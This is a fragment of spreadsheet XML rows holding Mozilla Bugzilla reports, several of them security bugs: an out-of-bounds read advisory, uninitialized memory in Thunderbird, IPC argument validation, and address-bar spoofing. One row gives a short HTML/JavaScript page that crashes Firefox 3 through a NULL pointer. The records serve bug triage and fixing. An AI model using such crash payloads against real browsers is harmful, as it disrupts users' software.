        <v>1</v>
      </c>
      <c r="U4599" t="n">
        <v>0</v>
      </c>
      <c r="V4599" t="n">
        <v>8</v>
      </c>
      <c r="W4599" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)
BuildID:    2000051708
When you try to type a URL into the URLbar you cant, if you try to search using 
the sidebar you cant type. 
Reproducible: Always
Steps to Reproduce:
1.click on URLBAR try to type
2.
3.</t>
        </is>
      </c>
      <c r="X4599" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4600">
      <c r="A4600" t="n">
        <v>1641303</v>
      </c>
      <c r="B4600" t="inlineStr">
        <is>
          <t>2020-05-27 11:37:03 -0700</t>
        </is>
      </c>
      <c r="C4600" t="inlineStr">
        <is>
          <t>TALOS-2020-1088 Mozilla Firefox URL mPath</t>
        </is>
      </c>
      <c r="D4600" t="inlineStr">
        <is>
          <t>2024-05-30 10:14:54 -0700</t>
        </is>
      </c>
      <c r="E4600" t="n">
        <v>1</v>
      </c>
      <c r="F4600" t="n">
        <v>1</v>
      </c>
      <c r="G4600" t="n">
        <v>3</v>
      </c>
      <c r="H4600" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4600" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4600" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K4600" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4600" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4600" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4600" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4600" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4600" t="inlineStr">
        <is>
          <t>[necko-triaged][adv-main78+][adv-esr68.10+][sec-survey]</t>
        </is>
      </c>
      <c r="Q4600" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4600" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4600" t="inlineStr">
        <is>
          <t>mozilla79</t>
        </is>
      </c>
      <c r="T4600" t="n">
        <v>1</v>
      </c>
      <c r="U4600" t="n">
        <v>0</v>
      </c>
      <c r="V4600" t="n">
        <v>33</v>
      </c>
      <c r="W4600" t="inlineStr">
        <is>
          <t>Created attachment 9152175
POC_URL mPath Memory Leak.html
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
Steps to reproduce:
### Summary
An information disclosure vulnerability exists in the URL mPath functionality of Mozilla Firefox Firefox Nightly Version 78.0a1 x64 and Firefox Release Version 76.0.2 x64. A specially crafted URL object can cause an out-of-bounds read. An attacker can visit a webpage to trigger this vulnerability.
Tested Versions:
Mozilla Firefox Firefox Nightly Version 78.0a1 x64   
Mozilla Firefox Firefox Release Version 76.0.2 x64  
Actual results:
Please review attached advisory and poc file
Expected results:
Please review attached advisory and poc file</t>
        </is>
      </c>
      <c r="X4600" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4601">
      <c r="A4601" t="n">
        <v>1608539</v>
      </c>
      <c r="B4601" t="inlineStr">
        <is>
          <t>2020-01-10 11:53:57 -0800</t>
        </is>
      </c>
      <c r="C4601" t="inlineStr">
        <is>
          <t>C-C TB mochitest+valgrind uncovered uninitialized memory access.: |m_headerstartpos| is not always initialized in nsParseMailMessageState::FinalizeHeaders()</t>
        </is>
      </c>
      <c r="D4601" t="inlineStr">
        <is>
          <t>2020-08-08 09:37:18 -0700</t>
        </is>
      </c>
      <c r="E4601" t="n">
        <v>1</v>
      </c>
      <c r="F4601" t="n">
        <v>1</v>
      </c>
      <c r="G4601" t="n">
        <v>3</v>
      </c>
      <c r="H4601" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4601" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J4601" t="inlineStr">
        <is>
          <t>Backend</t>
        </is>
      </c>
      <c r="K4601" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4601" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4601" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4601" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4601" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4601" t="inlineStr"/>
      <c r="Q4601" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4601" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4601" t="inlineStr">
        <is>
          <t>Thunderbird 74.0</t>
        </is>
      </c>
      <c r="T4601" t="n">
        <v>1</v>
      </c>
      <c r="U4601" t="n">
        <v>0</v>
      </c>
      <c r="V4601" t="n">
        <v>35</v>
      </c>
      <c r="W4601" t="inlineStr">
        <is>
          <t>Created attachment 9120154
valgrind-xpctest-check.patch
The subject says it all
|m_headerstartpos| is not always initialized in nsParseMailMessageState::FinalizeHeaders() 
The unitinitialized reference happens at
https://searchfox.org/comm-central/source/mailnews/local/src/nsParseMailbox.cpp#1223
I found this by running xpcshell-tests under valgrind.
If m_headerstartpos is not properly initialized, literally anything goes. 
Header parsing, etc. get all screwed up.
The symptom of strange display of message in a message pane that shows only blank or in the middle of header, etc. could be at least partially explained by this bug. (Maybe not all the cases.)
I detected the issue using valgrind,  and then began dumping m_headerstartpos after I set
```
export MALLOC_CHECK_=3
export MALLOC_PERTURB_=0x5A
```
in my environment. GNU libc malloc fills the uninitialized malloc'ed area with 0xA5.
Thus it is rather easy to find it in an otherwise normal dump.
```
cf. From man mallopt.
       M_PERTURB (since glibc 2.4)
              If this parameter is set to a nonzero value, then bytes of allocated memory  (other  than  alloca‐
              tions  via calloc(3)) are initialized to the complement of the value in the least significant byte
              of value, and when allocated memory is released using free(3), the freed  bytes  are  set  to  the
              least  significant  byte  of value.  This can be useful for detecting errors where programs incor‐
              rectly rely on allocated memory being initialized to zero, or reuse values in memory that has  al‐
              ready been freed.
   ...
       MALLOC_PERTURB_
              Controls the same parameter as mallopt() M_PERTURB.
```
The tests that trigger and not trigger the symptoms in C-C portion of xpcshell-tests are as follows.
This is the output from egrep "(nrun-xpcshell-original.sh|a5a5a5a5)" log1155-xpcshell.txt
log1155-xpcshell.txt being the log output.
```
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/chat/components/src/test
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/chat/modules/test
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/chat/protocols/irc/test
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/chat/protocols/skype/test
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/chat/protocols/xmpp/test
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/common/saxparser/test/unit
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/common/test/xpcshell
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/ldap/xpcom/tests/unit
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/mail/base/test/unit
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/mail/components/enterprisepolicies/tests/xpcshell
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/mail/components/extensions/test/xpcshell
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/mail/components/test/unit
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/mailnews/addrbook/test/unit
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/mailnews/base/test/unit
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/mailnews/compose/test/unit
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/mailnews/db/gloda/test/unit
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/mailnews/db/msgdb/test/unit
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/mailnews/extensions/bayesian-spam-filter/test/unit
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/mailnews/extensions/mdn/test/unit
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/mailnews/extensions/newsblog/test/unit
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/mailnews/imap/test/unit
 1:14.92 pid:109013 (debug) VALGRIND: m_headerstartpos = 0xa5a5a5a5a5a5a5a5, mozstatus-&gt;value =0x0x55788019a046,m_headers.GetBuffer()=0x557880199fe0, m_envelope_pos=0x0
 2:17.25 pid:110314 (debug) VALGRIND: m_headerstartpos = 0xa5a5a5a5a5a5a5a5, mozstatus-&gt;value =0x0x557082978326,m_headers.GetBuffer()=0x5570829782c0, m_envelope_pos=0x0
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/mailnews/import/test/unit
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/mailnews/intl/test/unit
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/mailnews/jsaccount/test/unit
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/mailnews/local/test/unit
 0:09.37 pid:111723 (debug) VALGRIND: m_headerstartpos = 0xa5a5a5a5a5a5a5a5, mozstatus-&gt;value =0x0x5645cf9c8621,m_headers.GetBuffer()=0x5645cf9c85b0, m_envelope_pos=0x0
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/mailnews/mime/jsmime/test
+ bash -vx /home/ishikawa/bin/nrun-xpcshell-original.sh --sequential --verbose comm/mailnews/mime/test/unit
```
I inserted the dump of m_headerstartpos using the patch in the attached file.
I have not fully analyzed WHEN/HOW the uninitialized access happens. But I suspect this has something to do with malformed or missing headers.
I don't want to see some script kiddies sending out such messages en masse to disrupt TB users, thus setting the security flag.
Once we can be sure this is of minor issue, then we can unflag it.
TIA</t>
        </is>
      </c>
      <c r="X4601" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4602">
      <c r="A4602" t="n">
        <v>495875</v>
      </c>
      <c r="B4602" t="inlineStr">
        <is>
          <t>2009-06-01 15:20:38 -0700</t>
        </is>
      </c>
      <c r="C4602" t="inlineStr">
        <is>
          <t>Crash [@ BuildTextRunsScanner::BreakSink::SetBreaks] with -moz-column, pre-wrap, font-size-adjust, multiple text runs</t>
        </is>
      </c>
      <c r="D4602" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:48 -0700</t>
        </is>
      </c>
      <c r="E4602" t="n">
        <v>1</v>
      </c>
      <c r="F4602" t="n">
        <v>1</v>
      </c>
      <c r="G4602" t="n">
        <v>3</v>
      </c>
      <c r="H4602" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4602" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4602" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4602" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4602" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4602" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4602" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4602" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4602" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4602" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4602" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4602" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4602" t="n">
        <v>1</v>
      </c>
      <c r="U4602" t="n">
        <v>0</v>
      </c>
      <c r="V4602" t="n">
        <v>15</v>
      </c>
      <c r="W4602" t="inlineStr">
        <is>
          <t>Created attachment 380929
testcase (crashes Firefox when loaded)
###!!! ASSERTION: Flag set that should never be set! (memory safety error?): '!(mTextRun-&gt;GetFlags() &amp; (gfxTextRunWordCache::TEXT_UNUSED_FLAGS | nsTextFrameUtils::TEXT_UNUSED_FLAG))', file /Users/jruderman/central/layout/generic/nsTextFrameThebes.cpp, line 766
or
Crash [@ BuildTextRunsScanner::BreakSink::SetBreaks] touching random a memory location.</t>
        </is>
      </c>
      <c r="X4602" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4603">
      <c r="A4603" t="n">
        <v>801987</v>
      </c>
      <c r="B4603" t="inlineStr">
        <is>
          <t>2012-10-15 19:28:25 -0700</t>
        </is>
      </c>
      <c r="C4603" t="inlineStr">
        <is>
          <t>[OTA update] system notification never reappears after dismissing "Later" and then force updating</t>
        </is>
      </c>
      <c r="D4603" t="inlineStr">
        <is>
          <t>2012-10-17 14:20:47 -0700</t>
        </is>
      </c>
      <c r="E4603" t="n">
        <v>1</v>
      </c>
      <c r="F4603" t="n">
        <v>1</v>
      </c>
      <c r="G4603" t="n">
        <v>6</v>
      </c>
      <c r="H4603" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4603" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4603" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4603" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4603" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4603" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4603" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4603" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4603" t="inlineStr">
        <is>
          <t>[dogfooding-blocker]</t>
        </is>
      </c>
      <c r="Q4603" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4603" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4603" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4603" t="n">
        <v>1</v>
      </c>
      <c r="U4603" t="n">
        <v>0</v>
      </c>
      <c r="V4603" t="n">
        <v>10</v>
      </c>
      <c r="W4603" t="inlineStr">
        <is>
          <t>The system update notification never reappears if you defer to "Later", and then try to do a force update check again.  however, aus:svc does find the update on the server.
Dogfood blocker, as you can't apply the update if there's not Gaia system update notification to press.
logcat: 
10-15 19:24:23.929: I/Gecko(1015): UpdatePrompt: Forcing update check
10-15 19:24:23.949: I/Gecko(1015): *** AUS:SVC Checker:getUpdateURL - update URL: http://update.boot2gecko.org/nightly/update.xml?force=1
10-15 19:24:23.949: E/GeckoConsole(1015): AUS:SVC Checker:getUpdateURL - update URL: http://update.boot2gecko.org/nightly/update.xml?force=1
10-15 19:24:23.959: I/Gecko(1015): *** AUS:SVC Checker:checkForUpdates - sending request to: http://update.boot2gecko.org/nightly/update.xml?force=1
10-15 19:24:23.959: E/GeckoConsole(1015): AUS:SVC Checker:checkForUpdates - sending request to: http://update.boot2gecko.org/nightly/update.xml?force=1
10-15 19:24:23.959: I/GeckoDump(1015): XXX FIXME : Got a mozContentEvent: force-update-check
Repro:
1) install 10-15-2012 unagi nightly build
** Gaia: 589c7f8f7df88766f7a5fa944f6bb05eef04b8c3
** Gecko: 1ec4bdea9de7c0567810fd09cb55b02304b3186d
2) settings &gt; Device information &gt; Software Updates &gt; tap "Check Now"
3) Notice the system Update notification appears.  Tap it
4) A confirmation overlay asks to Install Now or "Later".  Choose Later.
5) Go back to settings &gt; and tap the force update check again.
6) Verify no system notifcation appears anymore, despite AUS:svc finding the update is available in logcat.
Expected:
- Force update should always show the system update notification, despite dismissing it earlier via "Later"
Actual:
- not update notification appears.   And without it, you can't update in gaia.</t>
        </is>
      </c>
      <c r="X4603" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4604">
      <c r="A4604" t="n">
        <v>1302905</v>
      </c>
      <c r="B4604" t="inlineStr">
        <is>
          <t>2016-09-14 17:23:20 -0700</t>
        </is>
      </c>
      <c r="C4604" t="inlineStr">
        <is>
          <t>TopSite Cells need a 0.5px border and should allow white backgrounds on favicons.</t>
        </is>
      </c>
      <c r="D4604" t="inlineStr">
        <is>
          <t>2016-10-20 10:39:36 -0700</t>
        </is>
      </c>
      <c r="E4604" t="n">
        <v>1</v>
      </c>
      <c r="F4604" t="n">
        <v>1</v>
      </c>
      <c r="G4604" t="n">
        <v>2</v>
      </c>
      <c r="H4604" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4604" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J4604" t="inlineStr">
        <is>
          <t>Home screen</t>
        </is>
      </c>
      <c r="K4604" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4604" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M4604" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N4604" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4604" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4604" t="inlineStr">
        <is>
          <t>[mobileAS]</t>
        </is>
      </c>
      <c r="Q4604" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4604" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4604" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4604" t="n">
        <v>1</v>
      </c>
      <c r="U4604" t="n">
        <v>0</v>
      </c>
      <c r="V4604" t="n">
        <v>5</v>
      </c>
      <c r="W4604" t="inlineStr">
        <is>
          <t>add a consistent .5px / 10% Alpha black outline to the block
and a similar line at the top of the title bar
Change existing default sites to allow white backgrounds for Amazon/Wikipedia. 
Change existing Topsites to not default to grey backgrounds.</t>
        </is>
      </c>
      <c r="X4604" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4605">
      <c r="A4605" t="n">
        <v>434878</v>
      </c>
      <c r="B4605" t="inlineStr">
        <is>
          <t>2008-05-20 16:06:42 -0700</t>
        </is>
      </c>
      <c r="C4605" t="inlineStr">
        <is>
          <t>change how automation does l10n repacks</t>
        </is>
      </c>
      <c r="D4605" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4605" t="n">
        <v>1</v>
      </c>
      <c r="F4605" t="n">
        <v>1</v>
      </c>
      <c r="G4605" t="n">
        <v>5</v>
      </c>
      <c r="H4605" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4605" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4605" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4605" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4605" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4605" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4605" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4605" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4605" t="inlineStr"/>
      <c r="Q4605" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4605" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4605" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4605" t="n">
        <v>1</v>
      </c>
      <c r="U4605" t="n">
        <v>0</v>
      </c>
      <c r="V4605" t="n">
        <v>46</v>
      </c>
      <c r="W4605" t="inlineStr">
        <is>
          <t>This bug is to track some work items that came up in conf call with Axel, Armen and myself just now.
The file shipped-locales is currently used for archival purpose, and also by the build processes to decide what locales to repack/push/announce. The shipped-locales file tells us what locales we shipped in a given release. Unknown how we currently track if a given locale is "release" or "beta". Regardless of rest of this bug, we'll continue to manually update shipped-locales for every release, to keep an archive of what locales were in what release. This is unchanged from how we already do things now.
1) Change build processes to start using all-locales (not shipped-locales!!) to generate locale repacks for each nightly/clobber build. Possibly changing all-locales to add specific platform exclusions, for example, 
 gu-IN linux win32
 ja linux win32
 ja-JP-mac osx
...but that might require tinderbox changes. Needs investigation. 
2) Do each locale repack as independent repack. Currently for release automation, we do all repacks for each locale, then do all push for each locale, then announce all repacks. Note that all repacks are sequence independent of each other. Proposal is to change process so each repack is self-contained repack-push-announce step. This means: 
- each repack can be done on different slaves, in parallel if slaves are available. 
- we can repack a newly added locale without having to repack every locale in the release. 
- failure of one repack will not block other later repacks from happening.
- this brings nightly repacks and release automation repacks closer in sync with each other.</t>
        </is>
      </c>
      <c r="X4605" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4606">
      <c r="A4606" t="n">
        <v>456727</v>
      </c>
      <c r="B4606" t="inlineStr">
        <is>
          <t>2008-09-24 04:23:15 -0700</t>
        </is>
      </c>
      <c r="C4606" t="inlineStr">
        <is>
          <t>document designMode on, replace/delete HTML tag, queryCommand*('backcolor'); causes NULL pointer</t>
        </is>
      </c>
      <c r="D4606" t="inlineStr">
        <is>
          <t>2009-04-01 16:11:24 -0700</t>
        </is>
      </c>
      <c r="E4606" t="n">
        <v>1</v>
      </c>
      <c r="F4606" t="n">
        <v>1</v>
      </c>
      <c r="G4606" t="n">
        <v>3</v>
      </c>
      <c r="H4606" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4606" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4606" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K4606" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4606" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4606" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4606" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4606" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4606" t="inlineStr">
        <is>
          <t>[sg:dos][fixed by bug 448329]</t>
        </is>
      </c>
      <c r="Q4606" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4606" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4606" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4606" t="n">
        <v>1</v>
      </c>
      <c r="U4606" t="n">
        <v>1</v>
      </c>
      <c r="V4606" t="n">
        <v>25</v>
      </c>
      <c r="W4606" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.30 Safari/525.13
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
This HTML crashes FireFox with a NULL pointer:
&lt;BODY onload="
document.designMode='on';
document.replaceChild(document.createElement('HTML'), document.firstChild);
document.queryCommandValue('backcolor');
"&gt;
Reproducible: Always
Steps to Reproduce:
1. Load the supplied URL in FireFox 3
 or
1. Create a HTML file with this contents:
&lt;BODY onload="
document.designMode='on';
document.replaceChild(document.createElement('HTML'), document.firstChild);
document.queryCommandValue('backcolor');
"&gt;
2. Load the file in FireFox 3.
Actual Results:  
NULL pointer Access Violation
Expected Results:  
normal page load, potentially with JavaScript error.</t>
        </is>
      </c>
      <c r="X4606" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4607">
      <c r="A4607" t="n">
        <v>1505678</v>
      </c>
      <c r="B4607" t="inlineStr">
        <is>
          <t>2018-11-07 22:53:57 -0800</t>
        </is>
      </c>
      <c r="C4607" t="inlineStr">
        <is>
          <t>ExternalHelperAppParent doesn't validate arguments (potential sandbox issue)</t>
        </is>
      </c>
      <c r="D4607" t="inlineStr">
        <is>
          <t>2019-11-07 02:07:41 -0800</t>
        </is>
      </c>
      <c r="E4607" t="n">
        <v>1</v>
      </c>
      <c r="F4607" t="n">
        <v>1</v>
      </c>
      <c r="G4607" t="n">
        <v>3</v>
      </c>
      <c r="H4607" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4607" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4607" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K4607" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4607" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4607" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4607" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4607" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4607" t="inlineStr">
        <is>
          <t>[necko-triaged][post-cristsmash-triage][adv-main66+]</t>
        </is>
      </c>
      <c r="Q4607" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4607" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4607" t="inlineStr">
        <is>
          <t>mozilla67</t>
        </is>
      </c>
      <c r="T4607" t="n">
        <v>1</v>
      </c>
      <c r="U4607" t="n">
        <v>0</v>
      </c>
      <c r="V4607" t="n">
        <v>12</v>
      </c>
      <c r="W4607" t="inlineStr">
        <is>
          <t>I've been looking for variants of bug 1438425, using static analysis to find similar cases.I wrote Semmle query for parent IPDL handlers which take an  nsCString parameter called "data". Mostly these related to remoting various nsiStreamListeners. Overall the architecture concerns me: there seems to be a lot of parameters passed back and forth between parent and child,  and there are a lot of paramters which are just taken at face value in the parent. BUT I haven't found a concrete issue yet, so I'm filing this to get other opinions. 
Take ExternalHelperAppParent::RecvOnDataAvailable[1] as an example. It receives `nsCString&amp; data`, and also an offset and count from the child. These are passed into:
DebugOnly&lt;nsresult&gt; rv = NS_NewByteInputStream(getter_AddRefs(stringStream), data.get(), count, NS_ASSIGNMENT_DEPEND);
It's hard to trace, but as far as I can tell, these values end up in nsExternalAppHandler::OnDataAvailable [2], where the stream is written to a temporary file. Now this on it's own isn't too serious - you can maybe stream a bunch  of memory into a file. But thats a guess, and if you can then read the file, then we have at least an info leak. 
My more general question is: "is it safe to pass untrusted length values to NS_NewByteInputStream. If the answer is no, then there are half a dozen other places that we need to add checks (Recv*DataAvailable mostly). And I assume the fix here is just to check that the  count &lt; data.length() 
[1] https://searchfox.org/mozilla-central/rev/6e0e603f4852b8e571e5b8ae133e772b18b6016e/uriloader/exthandler/ExternalHelperAppParent.cpp#156
[2] https://searchfox.org/mozilla-central/rev/6e0e603f4852b8e571e5b8ae133e772b18b6016e/uriloader/exthandler/nsExternalHelperAppService.cpp#1939
[3] https://searchfox.org/mozilla-central/search?q=Recv.*dataAvailable&amp;case=false&amp;regexp=true&amp;path=parent</t>
        </is>
      </c>
      <c r="X4607" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4608">
      <c r="A4608" t="n">
        <v>1704422</v>
      </c>
      <c r="B4608" t="inlineStr">
        <is>
          <t>2021-04-11 22:11:33 -0700</t>
        </is>
      </c>
      <c r="C4608" t="inlineStr">
        <is>
          <t>Address Bar Spoofing due to Arabic RTL characters</t>
        </is>
      </c>
      <c r="D4608" t="inlineStr">
        <is>
          <t>2024-05-30 10:29:56 -0700</t>
        </is>
      </c>
      <c r="E4608" t="n">
        <v>1</v>
      </c>
      <c r="F4608" t="n">
        <v>1</v>
      </c>
      <c r="G4608" t="n">
        <v>2</v>
      </c>
      <c r="H4608" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4608" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J4608" t="inlineStr">
        <is>
          <t>Toolbar</t>
        </is>
      </c>
      <c r="K4608" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4608" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4608" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4608" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4608" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4608" t="inlineStr">
        <is>
          <t>desktop version is bug 1704420[fixed in Fenix 92]</t>
        </is>
      </c>
      <c r="Q4608" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
